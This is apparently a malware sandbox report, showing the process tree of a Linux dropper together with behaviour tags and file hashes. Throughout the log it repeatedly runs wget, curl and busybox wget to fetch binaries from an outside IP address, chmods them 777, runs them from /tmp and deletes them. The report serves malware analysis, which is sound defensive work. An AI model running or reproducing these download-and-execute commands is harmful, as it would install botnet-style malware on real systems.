/tmp/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P./A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P2⤵
- Executes dropped EXE
PID:897
-
-
/bin/rmrm A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P2⤵PID:898
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t2⤵PID:899
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:900
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t2⤵PID:901
-
-
/bin/chmodchmod 777 oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t2⤵
- File and Directory Permissions Modification
PID:902
-
-
/tmp/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t./oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t2⤵
- Executes dropped EXE
PID:903
-
-
/bin/rmrm oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t2⤵PID:904
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu2⤵PID:905
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:906
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu2⤵PID:907
-
-
/bin/chmodchmod 777 Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu2⤵
- File and Directory Permissions Modification
PID:908
-
-
/tmp/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu./Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu2⤵
- Executes dropped EXE
PID:909
-
-
/bin/rmrm Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu2⤵PID:910
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/aht8qi13vR83cufA19JeM2QdZqklsVQxUe2⤵PID:911
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/aht8qi13vR83cufA19JeM2QdZqklsVQxUe2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:912
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/aht8qi13vR83cufA19JeM2QdZqklsVQxUe2⤵PID:913
-
-
/bin/chmodchmod 777 aht8qi13vR83cufA19JeM2QdZqklsVQxUe2⤵
- File and Directory Permissions Modification
PID:914
-
-
/tmp/aht8qi13vR83cufA19JeM2QdZqklsVQxUe./aht8qi13vR83cufA19JeM2QdZqklsVQxUe2⤵
- Executes dropped EXE
PID:915
-
-
/bin/rmrm aht8qi13vR83cufA19JeM2QdZqklsVQxUe2⤵PID:916
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq12⤵PID:917
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq12⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:919
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq12⤵PID:921
-
-
/bin/chmodchmod 777 MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq12⤵
- File and Directory Permissions Modification
PID:922
-
-
/tmp/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq1./MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq12⤵
- Executes dropped EXE
PID:923
-
-
/bin/rmrm MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq12⤵PID:924
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs2⤵PID:925
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:926
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs2⤵PID:927
-
-
/bin/chmodchmod 777 Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs2⤵
- File and Directory Permissions Modification
PID:928
-
-
/tmp/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs./Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs2⤵
- Executes dropped EXE
PID:929
-
-
/bin/rmrm Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs2⤵PID:930
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/93SohCRyB65qsR9PHr0olpVOMBCDET7daz2⤵PID:931
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/93SohCRyB65qsR9PHr0olpVOMBCDET7daz2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:932
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/93SohCRyB65qsR9PHr0olpVOMBCDET7daz2⤵PID:933
-
-
/bin/chmodchmod 777 93SohCRyB65qsR9PHr0olpVOMBCDET7daz2⤵
- File and Directory Permissions Modification
PID:934
-
-
/tmp/93SohCRyB65qsR9PHr0olpVOMBCDET7daz./93SohCRyB65qsR9PHr0olpVOMBCDET7daz2⤵
- Executes dropped EXE
PID:935
-
-
/bin/rmrm 93SohCRyB65qsR9PHr0olpVOMBCDET7daz2⤵PID:936
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm2⤵PID:937
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:938
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm2⤵PID:939
-
-
/bin/chmodchmod 777 i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm2⤵
- File and Directory Permissions Modification
PID:940
-
-
/tmp/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm./i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm2⤵
- Executes dropped EXE
PID:941
-
-
/bin/rmrm i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm2⤵PID:942
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg2⤵PID:943
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:944
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg2⤵PID:945
-
-
/bin/chmodchmod 777 0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg2⤵
- File and Directory Permissions Modification
PID:947
-
-
/tmp/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg./0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg2⤵
- Executes dropped EXE
PID:949
-
-
/bin/rmrm 0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg2⤵PID:950
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO2⤵PID:951
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:952
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO2⤵PID:953
-
-
/bin/chmodchmod 777 3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO2⤵
- File and Directory Permissions Modification
PID:954
-
-
/tmp/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO./3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO2⤵
- Executes dropped EXE
PID:955
-
-
/bin/rmrm 3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO2⤵PID:956
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97